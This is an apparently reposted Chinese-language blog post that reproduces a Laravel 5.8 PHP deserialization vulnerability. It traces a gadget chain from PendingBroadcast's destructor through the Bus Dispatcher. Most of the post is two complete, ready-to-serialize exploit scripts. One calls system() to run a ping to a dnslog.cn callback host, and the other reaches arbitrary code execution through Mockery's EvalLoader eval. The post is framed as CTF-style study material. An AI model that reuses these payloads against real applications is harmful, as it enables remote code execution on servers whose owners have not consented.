Laravel5.8反序列化复现分析

搭建环境

使用composer下载项目环境
composer create-project --prefer-dist laravel/laravel=5.8.* ./
详细的搭建参考上篇文章

漏洞分析

这次漏洞的起点位于
vendor\laravel\framework\src\Illuminate\Broadcasting\PendingBroadcast.php的析构函数

public function __destruct(){$this->events->dispatch($this->event);}

全局搜索一个我们可以利用的dispatch()方法

跟进查看commandShouldBeQueued()

protected function commandShouldBeQueued($command){return $command instanceof ShouldQueue;}

$command 需要实现这个接口全局查找一个合适的类

跟进dispatchToQueue($command)

 public function dispatchToQueue($command){$connection = $command->connection ?? null;$queue = call_user_func($this->queueResolver, $connection);if (! $queue instanceof Queue) {throw new RuntimeException('Queue resolver did not return a Queue implementation.');}if (method_exists($command, 'queue')) {return $command->queue($queue, $command);}return $this->pushCommandToQueue($queue, $command);}

$this->queueResolver作为要调用的命令, $connection作为参数
构造exp:

namespace Illuminate\Broadcasting{class PendingBroadcast{protected $event;protected $events;public function __construct($events, $event){$this->event = $event;$this->events = $events;}}class BroadcastEvent{public $connection;public function __construct($connection){$this->connection = $connection;}}
}
namespace Illuminate\Bus{class Dispatcher{protected $queueResolver;public function __construct($queueResolver){   $this->queueResolver = $queueResolver;}}
}namespace {$c = new Illuminate\Broadcasting\BroadcastEvent('ping aiuuvg.dnslog.cn');$b = new Illuminate\Bus\Dispatcher('system');$a = new Illuminate\Broadcasting\PendingBroadcast($b, $c);print(urlencode(serialize($a)));
}
?>

因为命令执行后的判断报错,导致结果出不来,但是可以执行一些命令的，比如ping，接下来找找看看能不能让他代码执行，全局搜索eval

绕过第一个判断不能让他return,跟进getClassName()

public function getClassName(){return $this->config->getName();}

getName()在MockConfiguration.php，name随便设即可

接着跟进getCode

eval("?>" . $definition->getCode());

这里返回一个code,将它设为我们想执行的代码即可

public function getCode(){return $this->code;}

构造exp：

namespace Illuminate\Broadcasting{use Mockery\Generator\MockConfiguration;use Mockery\Generator\MockDefinition;class PendingBroadcast{protected $event;protected $events;public function __construct($events, $event){$this->event = $event;$this->events = $events;} }class BroadcastEvent{public $connection;public function __construct(){$this->connection = new MockDefinition(new MockConfiguration());}}
}
namespace Illuminate\Bus{class Dispatcher{protected $queueResolver;public function __construct($queueResolver){   $this->queueResolver = $queueResolver;}}
}
namespace Mockery\Loader{class EvalLoader{}
}
namespace Mockery\Generator{class MockDefinition{protected $config;protected $code;public function __construct($config){$this->config = $config;$this->code = '';}}class MockConfiguration{protected $name="kb";}
}namespace {$c = new Illuminate\Broadcasting\BroadcastEvent();$b = new Illuminate\Bus\Dispatcher([new Mockery\Loader\EvalLoader,'load']);$a = new Illuminate\Broadcasting\PendingBroadcast($b, $c);print(urlencode(serialize($a)));
}

参考链接：合天网安-通过几道CTF题学习Laravel框架

本文来自互联网用户投稿，文章观点仅代表作者本人，不代表本站立场，不承担相关法律责任。如若转载，请注明出处。 如若内容造成侵权/违法违规/事实不符，请点击【内容举报】进行投诉反馈！